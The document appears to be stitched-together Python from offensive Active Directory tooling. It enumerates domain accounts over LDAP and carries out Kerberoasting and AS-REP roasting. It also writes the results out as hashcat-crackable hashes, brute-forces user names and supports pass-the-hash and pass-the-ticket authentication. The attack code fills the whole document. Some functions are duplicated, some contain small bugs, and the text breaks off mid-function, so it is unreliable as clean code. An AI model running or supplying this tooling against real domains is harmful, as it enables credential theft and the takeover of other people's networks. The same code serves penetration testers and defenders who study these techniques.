async def get_targets(self): try: q_asrep = self.session.query(ADUser).filter_by(ad_id = self.ad_id).filter(ADUser.UAC_DONT_REQUIRE_PREAUTH == True) q_spn = self.session.query(ADUser).filter_by(ad_id = self.ad_id).filter(ADUser.servicePrincipalName != None) for user in q_asrep.all(): if user.sAMAccountName == 'krbtgt': continue cred = KerberosCredential() cred.username = user.sAMAccountName cred.domain = self.domain_name self.targets_asreq[user.id] = cred self.total_targets += 1 for user in q_spn.all(): if user.sAMAccountName == 'krbtgt': continue target = KerberosSPN() target.username = user.sAMAccountName target.domain = self.domain_name self.targets_spn[user.id] = target self.total_targets += 1 return True, None except Exception as e: return None, e
def get_kerberos_cred(self):
secret = None
stye = None
if self.krb_rc4_hmac is not None:
stype = KerberosSecretType.RC4
secret = self.krb_rc4_hmac
if self.nt_hash is not None:
stype = KerberosSecretType.RC4
secret = self.nt_hash
elif self.krb_aes128 is not None:
stype = KerberosSecretType.AES
secret = self.krb_aes128
elif self.krb_aes256 is not None:
stype = KerberosSecretType.AES
secret = self.krb_aes256
if stye is None:
raise Exception('Couldnt figure out correct stype for credential!')
kc = KerberosCredential()
kc.add_secret(stype, secret)
return kc
def get_target_from_args(args, to_spn=True):
targets = []
if args.user:
for user in args.user:
domain = None
username = None
if user.find('@') != -1:
#we take for granted that usernames do not have the char / in them!
username, domain = user.split('@')
else:
username = user
if args.realm:
domain = args.realm
else:
if domain is None:
raise Exception(
'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
)
if to_spn is True:
target = KerberosSPN()
target.username = username
target.domain = domain
else:
target = KerberosCredential()
target.username = username
target.domain = domain
targets.append(target)
return targets
def get_targets_from_file(args, to_spn=True):
targets = []
if args.targets:
with open(args.targets, 'r') as f:
for line in f:
line = line.strip()
domain = None
username = None
if line.find('@') != -1:
#we take for granted that usernames do not have the char @ in them!
username, domain = line.split('@')
else:
username = line
if args.realm:
domain = args.realm
else:
if domain is None:
raise Exception(
'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
)
if to_spn is True:
target = KerberosSPN()
target.username = username
target.domain = domain
else:
target = KerberosCredential()
target.username = username
target.domain = domain
targets.append(target)
return targets
async def get_ldap_kerberos_targets(ldap_url, target_type = 'all', authmethod = 'ntlm', host = None):
if ldap_url == 'auto':
ldap_url = get_ldap_url(authmethod = authmethod, host = host)
msldap_url = MSLDAPURLDecoder(ldap_url)
client = msldap_url.get_client()
_, err = await client.connect()
if err is not None:
raise err
domain = client._ldapinfo.distinguishedName.replace('DC=','').replace(',','.')
spn_users = []
asrep_users = []
if target_type == 'asrep' or target_type == 'all':
async for user, err in client.get_all_knoreq_users():
if err is not None:
raise err
cred = KerberosCredential()
cred.username = user.sAMAccountName
cred.domain = domain
asrep_users.append(cred)
if target_type == 'spn' or target_type == 'all':
async for user, err in client.get_all_service_users():
if err is not None:
raise err
cred = KerberosSPN()
cred.username = user.sAMAccountName
cred.domain = domain
spn_users.append(cred)
return asrep_users, spn_users
def process_target_line(target, realm=None, to_spn=True):
spn = KerberosSPN()
if to_spn is False:
spn = KerberosCredential()
line = target.strip()
if line == '':
return None
m = line.find('@')
if m == -1:
if realm is not None:
spn.username = line
spn.domain = realm
else:
raise Exception(
'User %s is missing realm specification and no global realm is defined!'
% line)
else:
spn.username, spn.domain = line.split('@', 1)
if realm is not None:
spn.domain = realm
return spn
async def live_roast(outfile=None):
try:
logon = get_logon_info()
domain = logon['domain']
url = 'ldap+sspi-ntlm://%s' % logon['logonserver']
msldap_url = MSLDAPURLDecoder(url)
client = msldap_url.get_client()
_, err = await client.connect()
if err is not None:
raise err
domain = client._ldapinfo.distinguishedName.replace('DC=', '').replace(
',', '.')
spn_users = []
asrep_users = []
errors = []
results = []
final_results = []
spn_cnt = 0
asrep_cnt = 0
async for user, err in client.get_all_knoreq_users():
if err is not None:
raise err
cred = KerberosCredential()
cred.username = user.sAMAccountName
cred.domain = domain
asrep_users.append(cred)
async for user, err in client.get_all_service_users():
if err is not None:
raise err
cred = KerberosCredential()
cred.username = user.sAMAccountName
cred.domain = domain
spn_users.append(cred)
for cred in asrep_users:
results = []
ks = KerberosTarget(domain)
ar = APREPRoast(ks)
res = await ar.run(cred, override_etype=[23])
results.append(res)
if outfile is not None:
filename = outfile + 'asreproast_%s_%s.txt' % (
logon['domain'],
datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
with open(filename, 'w', newline='') as f:
for thash in results:
asrep_cnt += 1
f.write(thash + '\r\n')
else:
final_results += results
results = []
for cred in spn_users:
spn_name = '%s@%s' % (cred.username, cred.domain)
if spn_name[:6] == 'krbtgt':
continue
try:
ctx = AcquireCredentialsHandle(None, 'kerberos', spn_name,
SECPKG_CRED.OUTBOUND)
res, ctx, data, outputflags, expiry = InitializeSecurityContext(
ctx,
spn_name,
token=None,
ctx=ctx,
flags=ISC_REQ.ALLOCATE_MEMORY | ISC_REQ.CONNECTION)
if res == SEC_E.OK or res == SEC_E.CONTINUE_NEEDED:
ticket = InitialContextToken.load(
data[0][1]).native['innerContextToken']
else:
raise Exception('Error %s' % res.value)
except Exception as e:
print(e)
errors.append((spn_name, e))
continue
results.append(TGSTicket2hashcat(ticket))
if outfile is not None:
filename = outfile + 'spnroast_%s_%s.txt' % (
logon['domain'],
datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
with open(filename, 'w', newline='') as f:
for thash in results:
spn_cnt += 1
f.write(thash + '\r\n')
else:
final_results += results
return final_results, errors, None
except Exception as e:
return None, None, e
def build(self):
if self.creds.auth_method == LDAPAuthProtocol.SICILY:
ntlmcred = MSLDAPNTLMCredential()
ntlmcred.username = self.creds.username
ntlmcred.domain = self.creds.domain if self.creds.domain is not None else ''
ntlmcred.workstation = None
ntlmcred.is_guest = False
ntlmcred.encrypt = self.creds.encrypt
if self.creds.password is None:
raise Exception(
'NTLM authentication requres password/NT hash!')
if len(self.creds.password) == 32:
try:
bytes.fromhex(self.creds.password)
except:
ntlmcred.password = self.creds.password
else:
ntlmcred.nt_hash = self.creds.password
else:
ntlmcred.password = self.creds.password
settings = NTLMHandlerSettings(ntlmcred)
return NTLMAUTHHandler(settings)
elif self.creds.auth_method == LDAPAuthProtocol.SIMPLE:
cred = MSLDAPPLAINCredential()
cred.username = self.creds.username
cred.domain = self.creds.domain
cred.password = self.creds.password
return cred
elif self.creds.auth_method == LDAPAuthProtocol.PLAIN:
cred = MSLDAPSIMPLECredential()
cred.username = self.creds.username
cred.domain = self.creds.domain
cred.password = self.creds.password
return cred
elif self.creds.auth_method in [
LDAPAuthProtocol.NTLM_PASSWORD, LDAPAuthProtocol.NTLM_NT
]:
ntlmcred = MSLDAPNTLMCredential()
ntlmcred.username = self.creds.username
ntlmcred.domain = self.creds.domain if self.creds.domain is not None else ''
ntlmcred.workstation = None
ntlmcred.is_guest = False
ntlmcred.encrypt = self.creds.encrypt
if self.creds.password is None:
raise Exception('NTLM authentication requres password!')
if self.creds.auth_method == LDAPAuthProtocol.NTLM_PASSWORD:
ntlmcred.password = self.creds.password
elif self.creds.auth_method == LDAPAuthProtocol.NTLM_NT:
ntlmcred.nt_hash = self.creds.password
else:
raise Exception('Unknown NTLM auth method!')
settings = NTLMHandlerSettings(ntlmcred)
handler = NTLMAUTHHandler(settings)
##setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context(
'NTLMSSP - Microsoft NTLM Security Support Provider', handler)
return spneg
elif self.creds.auth_method in [
LDAPAuthProtocol.KERBEROS_RC4, LDAPAuthProtocol.KERBEROS_NT,
LDAPAuthProtocol.KERBEROS_AES,
LDAPAuthProtocol.KERBEROS_PASSWORD,
LDAPAuthProtocol.KERBEROS_CCACHE,
LDAPAuthProtocol.KERBEROS_KEYTAB
]:
if self.target is None:
raise Exception('Target must be specified with Kerberos!')
if self.target.host is None:
raise Exception(
'target must have a domain name or hostname for kerberos!')
if self.target.dc_ip is None:
raise Exception('target must have a dc_ip for kerberos!')
kcred = MSLDAPKerberosCredential()
kc = KerberosCredential()
kc.username = self.creds.username
kc.domain = self.creds.domain
kcred.enctypes = []
if self.creds.auth_method == LDAPAuthProtocol.KERBEROS_PASSWORD:
kc.password = self.creds.password
kcred.enctypes = [23, 17, 18]
elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_NT:
kc.nt_hash = self.creds.password
kcred.enctypes = [23]
elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_AES:
if len(self.creds.password) == 32:
kc.kerberos_key_aes_128 = self.creds.password
kcred.enctypes = [17]
elif len(self.creds.password) == 64:
kc.kerberos_key_aes_256 = self.creds.password
kcred.enctypes = [18]
elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_RC4:
kc.kerberos_key_rc4 = self.creds.password
kcred.enctypes = [23]
elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_CCACHE:
kc.ccache = self.creds.password
kcred.enctypes = [23, 17, 18]
elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_KEYTAB:
kc.keytab = self.creds.password
kcred.enctypes = [23, 17, 18]
else:
raise Exception(
'No suitable secret type found to set up kerberos!')
if self.creds.etypes is not None:
kcred.enctypes = list(
set(self.creds.etypes).intersection(set(kcred.enctypes)))
kcred.ccred = kc
kcred.spn = KerberosSPN.from_target_string(
self.target.to_target_string())
kcred.target = KerberosTarget(self.target.dc_ip)
kcred.encrypt = self.creds.encrypt
if self.target.proxy is not None:
kcred.target.proxy = KerberosProxy()
kcred.target.proxy.type = self.target.proxy.type
kcred.target.proxy.target = copy.deepcopy(
self.target.proxy.target)
kcred.target.proxy.target.endpoint_ip = self.target.dc_ip
kcred.target.proxy.target.endpoint_port = 88
kcred.target.proxy.creds = copy.deepcopy(
self.target.proxy.auth)
handler = MSLDAPKerberos(kcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5', handler)
return spneg
elif self.creds.auth_method == LDAPAuthProtocol.SSPI_KERBEROS:
if self.target is None:
raise Exception('Target must be specified with Kerberos SSPI!')
kerbcred = MSLDAPKerberosSSPICredential()
kerbcred.username = self.creds.domain if self.creds.domain is not None else '<CURRENT>'
kerbcred.username = self.creds.username if self.creds.username is not None else '<CURRENT>'
kerbcred.password = self.creds.password if self.creds.password is not None else '<CURRENT>'
kerbcred.spn = self.target.to_target_string()
kerbcred.encrypt = self.creds.encrypt
handler = MSLDAPKerberosSSPI(kerbcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5', handler)
return spneg
elif self.creds.auth_method == LDAPAuthProtocol.SSPI_NTLM:
ntlmcred = MSLDAPNTLMSSPICredential()
ntlmcred.username = self.creds.domain if self.creds.domain is not None else '<CURRENT>'
ntlmcred.username = self.creds.username if self.creds.username is not None else '<CURRENT>'
ntlmcred.password = self.creds.password if self.creds.password is not None else '<CURRENT>'
ntlmcred.encrypt = self.creds.encrypt
handler = MSLDAPNTLMSSPI(ntlmcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context(
'NTLMSSP - Microsoft NTLM Security Support Provider', handler)
return spneg
elif self.creds.auth_method.value.startswith('MULTIPLEXOR'):
if self.creds.auth_method in [
LDAPAuthProtocol.MULTIPLEXOR_SSL_NTLM,
LDAPAuthProtocol.MULTIPLEXOR_NTLM
]:
from msldap.authentication.ntlm.multiplexor import MSLDAPNTLMMultiplexor
ntlmcred = MSLDAPMultiplexorCredential()
ntlmcred.type = 'NTLM'
if self.creds.username is not None:
ntlmcred.username = '******'
if self.creds.domain is not None:
ntlmcred.domain = '<CURRENT>'
if self.creds.password is not None:
ntlmcred.password = '******'
ntlmcred.is_guest = False
ntlmcred.is_ssl = True if self.creds.auth_method == LDAPAuthProtocol.MULTIPLEXOR_SSL_NTLM else False
ntlmcred.parse_settings(self.creds.settings)
ntlmcred.encrypt = self.creds.encrypt
handler = MSLDAPNTLMMultiplexor(ntlmcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context(
'NTLMSSP - Microsoft NTLM Security Support Provider',
handler)
return spneg
elif self.creds.auth_method in [
LDAPAuthProtocol.MULTIPLEXOR_SSL_KERBEROS,
LDAPAuthProtocol.MULTIPLEXOR_KERBEROS
]:
from msldap.authentication.kerberos.multiplexor import MSLDAPKerberosMultiplexor
ntlmcred = MSLDAPMultiplexorCredential()
ntlmcred.type = 'KERBEROS'
ntlmcred.target = self.target
if self.creds.username is not None:
ntlmcred.username = '******'
if self.creds.domain is not None:
ntlmcred.domain = '<CURRENT>'
if self.creds.password is not None:
ntlmcred.password = '******'
ntlmcred.is_guest = False
ntlmcred.is_ssl = True if self.creds.auth_method == LDAPAuthProtocol.MULTIPLEXOR_SSL_NTLM else False
ntlmcred.parse_settings(self.creds.settings)
ntlmcred.encrypt = self.creds.encrypt
handler = MSLDAPKerberosMultiplexor(ntlmcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5',
handler)
return spneg
async def amain(args):
if args.command == 'tgs':
logging.debug('[TGS] started')
ku = KerberosClientURL.from_url(args.kerberos_connection_url)
cred = ku.get_creds()
target = ku.get_target()
spn = KerberosSPN.from_user_email(args.spn)
logging.debug('[TGS] target user: %s' % spn.get_formatted_pname())
logging.debug('[TGS] fetching TGT')
kcomm = AIOKerberosClient(cred, target)
await kcomm.get_TGT()
logging.debug('[TGS] fetching TGS')
await kcomm.get_TGS(spn)
kcomm.ccache.to_file(args.out_file)
logging.debug('[TGS] done!')
elif args.command == 'tgt':
logging.debug('[TGT] started')
ku = KerberosClientURL.from_url(args.kerberos_connection_url)
cred = ku.get_creds()
target = ku.get_target()
logging.debug('[TGT] cred: %s' % cred)
logging.debug('[TGT] target: %s' % target)
kcomm = AIOKerberosClient(cred, target)
logging.debug('[TGT] fetching TGT')
await kcomm.get_TGT()
kcomm.ccache.to_file(args.out_file)
logging.debug('[TGT] Done! TGT stored in CCACHE file')
elif args.command == 'asreproast':
if not args.targets and not args.user:
raise Exception(
'No targets loaded! Either -u or -t MUST be specified!')
creds = []
targets = get_targets_from_file(args, False)
targets += get_target_from_args(args, False)
if len(targets) == 0:
raise Exception(
'No targets were specified! Either use target file or specify target via cmdline'
)
logging.debug('[ASREPRoast] loaded %d targets' % len(targets))
logging.debug(
'[ASREPRoast] will suppoort the following encryption type: %s' %
(str(args.etype)))
ks = KerberosTarget(args.address)
ar = APREPRoast(ks)
hashes = []
for target in targets:
h = await ar.run(target, override_etype=[args.etype])
hashes.append(h)
if args.out_file:
with open(args.out_file, 'w') as f:
for thash in hashes:
f.write(thash + '\r\n')
else:
for thash in hashes:
print(thash)
logging.info('ASREPRoast complete')
elif args.command == 'spnroast':
if not args.targets and not args.user:
raise Exception(
'No targets loaded! Either -u or -t MUST be specified!')
targets = get_targets_from_file(args)
targets += get_target_from_args(args)
if len(targets) == 0:
raise Exception(
'No targets were specified! Either use target file or specify target via cmdline'
)
logging.debug('Kerberoast loaded %d targets' % len(targets))
if args.etype:
if args.etype == -1:
etypes = [23, 17, 18]
else:
etypes = [args.etype]
else:
etypes = [23, 17, 18]
logging.debug(
'Kerberoast will suppoort the following encryption type(s): %s' %
(','.join(str(x) for x in etypes)))
ku = KerberosClientURL.from_url(args.kerberos_connection_url)
cred = ku.get_creds()
target = ku.get_target()
ar = Kerberoast(target, cred)
hashes = await ar.run(targets, override_etype=etypes)
if args.out_file:
with open(args.out_file, 'w') as f:
for thash in hashes:
f.write(thash + '\r\n')
else:
for thash in hashes:
print(thash)
logging.info('Kerberoast complete')
elif args.command == 'brute':
target = KerberosTarget(args.address)
with open(args.targets, 'r') as f:
for line in f:
line = line.strip()
spn = KerberosSPN()
spn.username = line
spn.domain = args.realm
ke = KerberosUserEnum(target, spn)
result = await ke.run()
if result is True:
if args.out_file:
with open(args.out_file, 'a') as f:
f.write(result + '\r\n')
else:
print('[+] Enumerated user: %s' % str(spn))
logging.info('Kerberos user enumeration complete')
elif args.command == 'spnroast-sspi':
if platform.system() != 'Windows':
print('[-]This command only works on Windows!')
return
try:
from winsspi.sspi import KerberoastSSPI
except ImportError:
raise Exception('winsspi module not installed!')
if not args.targets and not args.user:
raise Exception(
'No targets loaded! Either -u or -t MUST be specified!')
targets = get_targets_from_file(args)
targets += get_target_from_args(args)
if len(targets) == 0:
raise Exception(
'No targets were specified! Either use target file or specify target via cmdline'
)
results = []
errors = []
for spn_name in targets:
ksspi = KerberoastSSPI()
try:
ticket = ksspi.get_ticket_for_spn(
spn_name.get_formatted_pname())
except Exception as e:
errors.append((spn_name, e))
continue
results.append(TGSTicket2hashcat(ticket))
if args.out_file:
with open(args.out_file, 'w') as f:
for thash in results:
f.write(thash + '\r\n')
else:
for thash in results:
print(thash)
for err in errors:
print('Failed to get ticket for %s. Reason: %s' % (err[0], err[1]))
logging.info('SSPI based Kerberoast complete')
elif args.command == 'spnroast-multiplexor':
#hiding the import so it's not necessary to install multiplexor
await spnmultiplexor(args)
elif args.command == 'auto':
if platform.system() != 'Windows':
print('[-]This command only works on Windows!')
return
try:
from winsspi.sspi import KerberoastSSPI
except ImportError:
raise Exception('winsspi module not installed!')
domain = args.dc_ip
url = 'ldap+sspi-ntlm://%s' % domain
msldap_url = MSLDAPURLDecoder(url)
client = msldap_url.get_client()
_, err = await client.connect()
if err is not None:
raise err
domain = client._ldapinfo.distinguishedName.replace('DC=', '').replace(
',', '.')
spn_users = []
asrep_users = []
results = []
errors = []
async for user, err in client.get_all_knoreq_users():
if err is not None:
raise err
cred = KerberosCredential()
cred.username = user.sAMAccountName
cred.domain = domain
asrep_users.append(cred)
async for user, err in client.get_all_service_users():
if err is not None:
raise err
cred = KerberosCredential()
cred.username = user.sAMAccountName
cred.domain = domain
spn_users.append(cred)
for cred in asrep_users:
ks = KerberosTarget(domain)
ar = APREPRoast(ks)
res = await ar.run(cred, override_etype=[args.etype])
results.append(res)
for cred in spn_users:
spn_name = '%s@%s' % (cred.username, cred.domain)
if spn_name[:6] == 'krbtgt':
continue
ksspi = KerberoastSSPI()
try:
ticket = ksspi.get_ticket_for_spn(spn_name)
except Exception as e:
errors.append((spn_name, e))
continue
results.append(TGSTicket2hashcat(ticket))
if args.out_file:
with open(args.out_file, 'w') as f:
for thash in results:
f.write(thash + '\r\n')
else:
for thash in results:
print(thash)
for err in errors:
print('Failed to get ticket for %s. Reason: %s' % (err[0], err[1]))
elif args.command == 'ldap':
ldap_url = MSLDAPURLDecoder(args.ldap_url)
client = ldap_url.get_client()
_, err = await client.connect()
if err is not None:
raise err
domain = client._ldapinfo.distinguishedName.replace('DC=', '').replace(
',', '.')
if args.out_file:
basefolder = ntpath.dirname(args.out_file)
basefile = ntpath.basename(args.out_file)
if args.type in ['spn', 'all']:
logging.debug('Enumerating SPN user accounts...')
cnt = 0
if args.out_file:
with open(os.path.join(basefolder,
basefile + '_spn_users.txt'),
'w',
newline='') as f:
async for user in client.get_all_service_users():
cnt += 1
f.write('%s@%s\r\n' % (user.sAMAccountName, domain))
else:
print('[+] SPN users')
async for user, err in client.get_all_service_users():
if err is not None:
raise err
cnt += 1
print('%s@%s' % (user.sAMAccountName, domain))
logging.debug('Enumerated %d SPN user accounts' % cnt)
if args.type in ['asrep', 'all']:
logging.debug('Enumerating ASREP user accounts...')
ctr = 0
if args.out_file:
with open(os.path.join(basefolder,
basefile + '_asrep_users.txt'),
'w',
newline='') as f:
async for user, err in client.get_all_knoreq_users():
if err is not None:
raise err
ctr += 1
f.write('%s@%s\r\n' % (user.sAMAccountName, domain))
else:
print('[+] ASREP users')
async for user, err in client.get_all_knoreq_users():
if err is not None:
raise err
ctr += 1
print('%s@%s' % (user.sAMAccountName, domain))
logging.debug('Enumerated %d ASREP user accounts' % ctr)
if args.type in ['full', 'all']:
logging.debug(
'Enumerating ALL user accounts, this will take some time depending on the size of the domain'
)
ctr = 0
attrs = args.attrs if args.attrs is not None else MSADUser_TSV_ATTRS
if args.out_file:
with open(os.path.join(basefolder,
basefile + '_ldap_users.tsv'),
'w',
newline='',
encoding='utf8') as f:
writer = csv.writer(f, delimiter='\t')
writer.writerow(attrs)
async for user, err in client.get_all_users():
if err is not None:
raise err
ctr += 1
writer.writerow(user.get_row(attrs))
else:
logging.debug('Are you sure about this?')
print('[+] Full user dump')
print('\t'.join(attrs))
async for user, err in client.get_all_users():
if err is not None:
raise err
ctr += 1
print('\t'.join([str(x) for x in user.get_row(attrs)]))
logging.debug('Enumerated %d user accounts' % ctr)
if args.type in ['custom']:
if not args.filter:
raise Exception(
'Custom LDAP search requires the search filter to be specified!'
)
if not args.attrs:
raise Exception(
'Custom LDAP search requires the attributes to be specified!'
)
logging.debug(
'Perforing search on the AD with the following filter: %s' %
args.filter)
logging.debug('Search will contain the following attributes: %s' %
','.join(args.attrs))
ctr = 0
if args.out_file:
with open(os.path.join(basefolder,
basefile + '_ldap_custom.tsv'),
'w',
newline='') as f:
writer = csv.writer(f, delimiter='\t')
writer.writerow(args.attrs)
async for obj, err in client.pagedsearch(
args.filter, args.attrs):
if err is not None:
raise err
ctr += 1
writer.writerow([
str(obj['attributes'].get(x, 'N/A'))
for x in args.attrs
])
else:
async for obj, err in client.pagedsearch(
args.filter, args.attrs):
if err is not None:
raise err
ctr += 1
print('\t'.join([
str(obj['attributes'].get(x, 'N/A'))
for x in args.attrs
]))
async def run_auto():
try:
if platform.system() != 'Windows':
print('[-]This command only works on Windows!')
return
try:
from winsspi.sspi import KerberoastSSPI
except ImportError:
raise Exception('winsspi module not installed!')
from winacl.functions.highlevel import get_logon_info
logon = get_logon_info()
domain = logon['domain']
url = 'ldap+sspi-ntlm://%s' % logon['logonserver']
msldap_url = MSLDAPURLDecoder(url)
client = msldap_url.get_client()
_, err = await client.connect()
if err is not None:
raise err
domain = client._ldapinfo.distinguishedName.replace('DC=', '').replace(
',', '.')
spn_users = []
asrep_users = []
errors = []
spn_cnt = 0
asrep_cnt = 0
async for user, err in client.get_all_knoreq_users():
if err is not None:
raise err
cred = KerberosCredential()
cred.username = user.sAMAccountName
cred.domain = domain
asrep_users.append(cred)
async for user, err in client.get_all_service_users():
if err is not None:
raise err
cred = KerberosCredential()
cred.username = user.sAMAccountName
cred.domain = domain
spn_users.append(cred)
for cred in asrep_users:
results = []
ks = KerberosTarget(domain)
ar = APREPRoast(ks)
res = await ar.run(cred, override_etype=[23])
results.append(res)
filename = 'asreproast_%s_%s.txt' % (
logon['domain'],
datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
with open(filename, 'w', newline='') as f:
for thash in results:
asrep_cnt += 1
f.write(thash + '\r\n')
results = []
for cred in spn_users:
spn_name = '%s@%s' % (cred.username, cred.domain)
if spn_name[:6] == 'krbtgt':
continue
ksspi = KerberoastSSPI()
try:
ticket = ksspi.get_ticket_for_spn(spn_name)
except Exception as e:
errors.append((spn_name, e))
continue
results.append(TGSTicket2hashcat(ticket))
filename = 'spnroast_%s_%s.txt' % (
logon['domain'],
datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
with open(filename, 'w', newline='') as f:
for thash in results:
spn_cnt += 1
f.write(thash + '\r\n')
for err in errors:
print('Failed to get ticket for %s. Reason: %s' % (err[0], err[1]))
print('[+] Done! %s spnroast tickets %s asreproast tickets' %
(spn_cnt, asrep_cnt))
except Exception as e:
print(e)
def get_creds(self):
if self.secret_type == KerberosSecretType.KEYTAB:
return KerberosCredential.from_keytab(self.secret, self.username,
self.domain)
res = KerberosCredential()
res.username = self.username
res.domain = self.domain
if self.secret_type in [
KerberosSecretType.PASSWORD, KerberosSecretType.PW,
KerberosSecretType.PASS
]:
res.password = self.secret
elif self.secret_type in [
KerberosSecretType.NT, KerberosSecretType.RC4
]:
if len(self.secret) != 32:
raise Exception('Incorrect RC4/NT key! %s' % self.secret)
res.nt_hash = self.secret
res.kerberos_key_rc4 = self.secret
elif self.secret_type in [
KerberosSecretType.AES128, KerberosSecretType.AES256,
KerberosSecretType.AES
]:
if self.secret_type == KerberosSecretType.AES:
if len(self.secret) == 32:
res.kerberos_key_aes_128 = self.secret
elif len(self.secret) == 64:
res.kerberos_key_aes_256 = self.secret
else:
raise Exception('Incorrect AES key! %s' % self.secret)
elif self.secret_type == KerberosSecretType.AES128:
if len(self.secret) != 32:
raise Exception('Incorrect AES128 key! %s' % self.secret)
res.kerberos_key_aes_128 = self.secret
else:
if len(self.secret) != 64:
raise Exception('Incorrect AES256 key! %s' % self.secret)
res.kerberos_key_aes_256 = self.secret
elif self.secret_type == KerberosSecretType.DES:
if len(self.secret) != 16:
raise Exception('Incorrect DES key! %s' % self.secret)
res.kerberos_key_des = self.secret
elif self.secret_type in [
KerberosSecretType.DES3, KerberosSecretType.TDES
]:
if len(self.secret) != 24:
raise Exception('Incorrect DES3 key! %s' % self.secret)
res.kerberos_key_des3 = self.secret
elif self.secret_type == KerberosSecretType.CCACHE:
res.ccache = self.secret
else:
raise Exception('Missing/unknown secret_type!')
return res
def build(self):
if self.creds.auth_method == LDAPAuthProtocol.SICILY:
ntlmcred = MSLDAPNTLMCredential()
ntlmcred.username = self.creds.username
ntlmcred.domain = self.creds.domain if self.creds.domain is not None else ''
ntlmcred.workstation = None
ntlmcred.is_guest = False
ntlmcred.encrypt = self.creds.encrypt
if self.creds.password is None:
raise Exception(
'NTLM authentication requres password/NT hash!')
if len(self.creds.password) == 32:
try:
bytes.fromhex(self.creds.password)
except:
ntlmcred.password = self.creds.password
else:
ntlmcred.nt_hash = self.creds.password
else:
ntlmcred.password = self.creds.password
settings = NTLMHandlerSettings(ntlmcred)
return NTLMAUTHHandler(settings)
elif self.creds.auth_method == LDAPAuthProtocol.SIMPLE:
cred = MSLDAPPLAINCredential()
cred.username = self.creds.username
cred.domain = self.creds.domain
cred.password = self.creds.password
return cred
elif self.creds.auth_method == LDAPAuthProtocol.PLAIN:
cred = MSLDAPSIMPLECredential()
cred.username = self.creds.username
cred.domain = self.creds.domain
cred.password = self.creds.password
return cred
elif self.creds.auth_method in [
LDAPAuthProtocol.NTLM_PASSWORD, LDAPAuthProtocol.NTLM_NT
]:
ntlmcred = MSLDAPNTLMCredential()
ntlmcred.username = self.creds.username
ntlmcred.domain = self.creds.domain if self.creds.domain is not None else ''
ntlmcred.workstation = None
ntlmcred.is_guest = False
ntlmcred.encrypt = self.creds.encrypt
if self.creds.password is None:
raise Exception('NTLM authentication requres password!')
if self.creds.auth_method == LDAPAuthProtocol.NTLM_PASSWORD:
ntlmcred.password = self.creds.password
elif self.creds.auth_method == LDAPAuthProtocol.NTLM_NT:
ntlmcred.nt_hash = self.creds.password
else:
raise Exception('Unknown NTLM auth method!')
settings = NTLMHandlerSettings(ntlmcred)
handler = NTLMAUTHHandler(settings)
##setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context(
'NTLMSSP - Microsoft NTLM Security Support Provider', handler)
return spneg
elif self.creds.auth_method in [
LDAPAuthProtocol.KERBEROS_RC4, LDAPAuthProtocol.KERBEROS_NT,
LDAPAuthProtocol.KERBEROS_AES,
LDAPAuthProtocol.KERBEROS_PASSWORD,
LDAPAuthProtocol.KERBEROS_CCACHE,
LDAPAuthProtocol.KERBEROS_KEYTAB,
LDAPAuthProtocol.KERBEROS_KIRBI, LDAPAuthProtocol.KERBEROS_PFX,
LDAPAuthProtocol.KERBEROS_PEM,
LDAPAuthProtocol.KERBEROS_CERTSTORE
]:
if self.target is None:
raise Exception('Target must be specified with Kerberos!')
if self.target.host is None:
raise Exception(
'target must have a domain name or hostname for kerberos!')
if self.target.dc_ip is None:
raise Exception('target must have a dc_ip for kerberos!')
kcred = MSLDAPKerberosCredential()
if self.creds.auth_method == LDAPAuthProtocol.KERBEROS_KIRBI:
kc = KerberosCredential.from_kirbi(self.creds.password,
self.creds.username,
self.creds.domain)
elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_CCACHE:
kc = KerberosCredential.from_ccache_file(
self.creds.password, self.creds.username,
self.creds.domain)
elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_KEYTAB:
kc = KerberosCredential.from_kirbi(self.creds.password,
self.creds.username,
self.creds.domain)
elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_PFX:
kc = KerberosCredential.from_pfx_file(
self.creds.username,
self.creds.password,
username=self.creds.altname,
domain=self.creds.altdomain)
self.creds.username = kc.username
self.creds.domain = kc.domain
self.target.domain = kc.domain
elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_PEM:
kc = KerberosCredential.from_pem_file(
self.creds.username,
self.creds.password,
username=self.creds.altname,
domain=self.creds.altdomain)
self.creds.username = kc.username
self.creds.domain = kc.domain
self.target.domain = kc.domain
elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_CERTSTORE:
# username is the CN of the certificate
# secret is the name of the certstore, default: MY
certstore = self.creds.secret
if self.creds.secret is None:
certstore = 'MY'
kc = KerberosCredential.from_windows_certstore(
self.creds.username,
certstore,
username=self.creds.altname,
domain=self.creds.altdomain)
self.creds.username = kc.username
self.creds.domain = kc.domain
self.target.domain = kc.domain
else:
kc = KerberosCredential()
kc.username = self.creds.username
kc.domain = self.creds.domain
kcred.enctypes = []
if self.creds.auth_method == LDAPAuthProtocol.KERBEROS_PASSWORD:
kc.password = self.creds.password
kcred.enctypes = [23, 17, 18]
elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_NT:
kc.nt_hash = self.creds.password
kcred.enctypes = [23]
elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_AES:
if len(self.creds.password) == 32:
kc.kerberos_key_aes_128 = self.creds.password
kcred.enctypes = [17]
elif len(self.creds.password) == 64:
kc.kerberos_key_aes_256 = self.creds.password
kcred.enctypes = [18]
